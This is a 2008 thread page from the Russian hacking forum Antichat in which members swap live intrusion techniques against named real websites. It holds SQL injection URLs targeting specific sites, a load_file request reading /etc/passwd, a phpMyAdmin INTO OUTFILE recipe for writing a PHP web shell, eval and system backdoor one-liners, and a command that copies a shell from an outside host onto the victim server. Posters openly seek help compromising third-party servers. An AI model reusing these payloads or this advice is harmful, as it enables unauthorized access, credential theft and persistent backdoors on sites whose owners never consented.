HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3121  
Старый 31.08.2008, 02:06
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами: 9367310

Репутация: 52
По умолчанию

Цитата:
Сообщение от 0nep@t0p  
2 jokester
Нет, там точно не на запятую ибо из информэйшн схема тэиблс все норм перебиралось лимитом, а вот из других табл уже облом
Линк кинул в пм
попробуй в запрос дописать +where+1=1, т.е. он будет примерно таким : www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+where+1=1+l imit+1,1/*
 
Ответить с цитированием

  #3122  
Старый 31.08.2008, 09:26
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами: 9742875

Репутация: 81
По умолчанию

есть читалка файлов

http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+load_file(0x2f6574632f706173737764) +from+users--


помогите найти путь к конфику апача

пробовал но не помогает:

/etc/httpd/conf/
/etc/apache/conf/
/etc/apache/
/etc/apache2/conf/
/var/httpd/conf
/var/www/conf
/usr/local/apache/conf/
/usr/local/apache2/conf/
/usr/local/httpd/conf/
 
Ответить с цитированием

  #3123  
Старый 31.08.2008, 10:18
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию

Перебирай. https://forum.antichat.ru/showpost.php?p=467361&postcount=1
Ес-сно без ../../../ в начале.
__________________
..
 
Ответить с цитированием

  #3124  
Старый 31.08.2008, 18:55
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
С нами: 9625938

Репутация: 32
По умолчанию

Народ прошу помощи.
Вобщем есть рут доступ к PhpMyAdmin

Мне нужно залить шел, но проблема в том что там инклуды отключены
Я заливал с помощью такого запроса
CREATE TABLE `forshelll` (`shl` TEXT NOT NULL)
TYPE = MYISAM ;
INSERT INTO `forshelll` ( `shell` )
VALUES (
'<?php include("http://shell.ru/shell.php") ?>'
); SELECT `shell` FROM `forshelll` INTO OUTFILE 'patch/www/shell.php'; DROP TABLE `forshelll`

Ворпос! как можно ище залить без инклуда?
 
Ответить с цитированием

  #3125  
Старый 31.08.2008, 19:33
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами: 9981026

Репутация: 728
По умолчанию

2 DJ ][akep
Юзай поиск, мне вот что часто помогало -
http://forum.antichat.ru/showpost.php?p=796617
 
Ответить с цитированием

  #3126  
Старый 31.08.2008, 22:17
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
Red face

Копал рыл ничего не нашёл! Гуру анти чата могет вы помогете!

www.dom2.ru есть уязвимости?

http://dom2.ru/pulse/heroes/?id=15601'

http://dom2.ru/magazine/?id=27965&article=3'

Жду ответа?
___________________________________________

И это уязвимость?
http://www.rk-triada.ru/index.php?-999

Последний раз редактировалось geforce; 31.08.2008 в 22:42..
 
Ответить с цитированием

  #3127  
Старый 31.08.2008, 23:58
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами: 10485026

Репутация: 1879


По умолчанию

Цитата:
Ворпос! как можно ище залить без инклуда?
PHP код:
if(isset($_GET)) eval($_GET); 
PHP код:
<?php system($_GET);?>
Хотя смысл один и тот же...
 
Ответить с цитированием

  #3128  
Старый 01.09.2008, 11:52
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию

Цитата:
Сообщение от DJ ][akep  
Народ прошу помощи.
Вобщем есть рут доступ к PhpMyAdmin

Мне нужно залить шел, но проблема в том что там инклуды отключены
Я заливал с помощью такого запроса
CREATE TABLE `forshelll` (`shl` TEXT NOT NULL)
TYPE = MYISAM ;
INSERT INTO `forshelll` ( `shell` )
VALUES (
'<?php include("http://shell.ru/shell.php") ?>'
); SELECT `shell` FROM `forshelll` INTO OUTFILE 'patch/www/shell.php'; DROP TABLE `forshelll`

Ворпос! как можно ище залить без инклуда?
SELECT '<?php if(isset($_REQUEST["id"])) eval($_REQUEST["id"]);?>' INTO OUTFILE '/blablabla/www/script.php';

Если пхпмайадмин будет ругаться, то переводи текст в кавычках в SQL HEX:
http://hack-shop.org.ru/tools-code-encode
И потом уже без кавычек подставляй в запрос.

/script.php?id=copy("http://shellsite.ru/shell.txt","/blablabla/www/shell.php");

/shell.php - тут шелл. Ессно должны быть права на запись, иначе хер что сделаешь.
__________________
..
 
Ответить с цитированием

  #3129  
Старый 01.09.2008, 16:33
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

А не подскажите что можно сделать с сайтом у которого идёт фильтрация против SQl инъекций...
Движок: PHP-nuke
Модули:
/modules.php?name=WhatYourSpeed
/modules.php?name=Rules
/modules.php?name=Downloads

Ссылка: _http://la2ice.ru/
 
Ответить с цитированием

  #3130  
Старый 01.09.2008, 17:50
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами: 9367310

Репутация: 52
По умолчанию

Доброго времени суток!
сайт http://geograd.ru/
magic_quotes off
мускул 5-ой версии
http://geograd.ru/?geo=-1&idnew=-328%27+union+select+1,2,3,4,table_schema+from+info rmation_schema.tables/*%22
тут все базы,судя по ним на серве крутится много сайтиков(если не прав,поправьте)
подскажите,как можно залить шелл на серв в данном случае?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.